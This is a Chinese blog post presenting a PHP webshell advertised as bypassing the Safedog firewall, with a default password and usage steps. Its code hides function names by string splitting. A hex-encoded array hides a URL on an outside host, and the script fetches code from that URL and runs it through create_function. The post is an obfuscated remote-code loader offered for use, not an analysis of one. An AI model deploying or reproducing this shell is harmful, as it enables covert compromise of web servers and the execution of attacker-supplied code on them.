zoukankan      html  css  js  c++  java
  • PHP版本过狗Shell

    默认密码demo
    使用方法 按p 输入密码 或者 你保存的xx.php?password=demo
    自定义密码在
    define('iphp','demo2');

    demo2 为你设定的密码。

    <?php
    define('T','H*');
    define('A','call');
    define('B','user');
    define('C','func');
    define('D','create');
    define('E','function');
    define('F','file');
    define('F1','get');
    define('F2','contents');
    define('P','pack');
    $p = P;
    $call = sprintf('%s_%s_%s',A,B,C);
    $create = sprintf('%s_%s',D,E);
    $file = sprintf('%s_%s_%s',F,F1,F2);
    $t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
    $call($create(null,$p(T,$file($p(T,join(null,$t))))));
    ?>
  • 相关阅读:
    Python--列表、元组
    python之helloworld
    JMeter添加压力机、下载文件
    JMeter接口测试
    Postman接口测试
    浅谈接口测试
    poj3974 最长回文串 exkmp
    GDOI2014 beyond(D2T3) exkmp
    hdu4333 扩展KMP
    poj 3080 KMP
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4344769.html
Copyright © 2011-2022 走看看